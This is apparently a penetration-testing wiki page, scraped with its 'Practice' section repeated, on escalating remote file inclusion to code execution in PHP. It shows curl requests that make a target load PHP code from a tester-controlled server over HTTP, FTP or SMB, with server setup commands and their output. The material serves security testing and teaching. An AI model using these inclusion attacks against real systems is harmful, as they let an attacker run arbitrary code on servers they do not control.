RFI to RCE

Last updated 1 year ago

Was this helpful?

Practice

We can host an arbitrary PHP code and access it through the HTTP protocol

# Create phpinfo.php
echo '<?php phpinfo(); ?>' > phpinfo.php

# Start a web server
python3 -m http.server 80

# Exploit the RFI to fetch the remote phpinfo.php file
curl '$URL/?parameter=http://tester.server/phpinfo.php'

The tester can also host his arbitrary PHP code and access it through the FTP protocol. He can use the python library pyftpdlib to start a FTP server.

# Start FTP server
sudo python3 -m pyftpdlib -p 21                                                                                                                                            1 ↵ alex@ubuntu
[I 2022-07-11 00:04:26] concurrency model: async
[I 2022-07-11 00:04:26] masquerade (NAT) address: None
[I 2022-07-11 00:04:26] passive ports: None
[I 2022-07-11 00:04:26] >>> starting FTP server on 0.0.0.0:21, pid=176948 <<<

# Exploit the RFI to fetch the remote phpinfo.php file
curl '$URL/?parameter=ftp://tester.server/phpinfo.php'

PHP uses the anonymous credentials to authenticate to the FTP server. If the tester needs to use custom credentials, he can authenticate as follows :

curl '$URL/?parameter=ftp://user:pass@tester.server/phpinfo.php'

Sometimes, the vulnerable web application is hosted on a Windows Server, meaning the attacker could log into a SMB Server to store the arbitrary PHP code.

sudo python3 smbserver.py -smb2support share $(pwd)                                                                                        130 ↵ alex@ubuntu
Impacket v0.10.1.dev1 - Copyright 2022 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

curl '$URL/?parameter=\\tester.server\phpinfo.php'

Practice

We can host an arbitrary PHP code and access it through the HTTP protocol

# Create phpinfo.php
echo '<?php phpinfo(); ?>' > phpinfo.php

# Start a web server
python3 -m http.server 80

# Exploit the RFI to fetch the remote phpinfo.php file
curl '$URL/?parameter=http://tester.server/phpinfo.php'

The tester can also host his arbitrary PHP code and access it through the FTP protocol. He can use the python library pyftpdlib to start a FTP server.

# Start FTP server
sudo python3 -m pyftpdlib -p 21                                                                                                                                            1 ↵ alex@ubuntu
[I 2022-07-11 00:04:26] concurrency model: async
[I 2022-07-11 00:04:26] masquerade (NAT) address: None
[I 2022-07-11 00:04:26] passive ports: None
[I 2022-07-11 00:04:26] >>> starting FTP server on 0.0.0.0:21, pid=176948 <<<

# Exploit the RFI to fetch the remote phpinfo.php file
curl '$URL/?parameter=ftp://tester.server/phpinfo.php'

PHP uses the anonymous credentials to authenticate to the FTP server. If the tester needs to use custom credentials, he can authenticate as follows :

curl '$URL/?parameter=ftp://user:pass@tester.server/phpinfo.php'

Sometimes, the vulnerable web application is hosted on a Windows Server, meaning the attacker could log into a SMB Server to store the arbitrary PHP code.

's (Python) script can be used on the attacker-controlled machine to create a SMB Server.

sudo python3 smbserver.py -smb2support share $(pwd)                                                                                        130 ↵ alex@ubuntu
Impacket v0.10.1.dev1 - Copyright 2022 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

The PHP script can then be included by using a Path.

curl '$URL/?parameter=\\tester.server\phpinfo.php'

RFI to RCE

RFI to RCE

Theory

Practice

References

Theory

Practice

References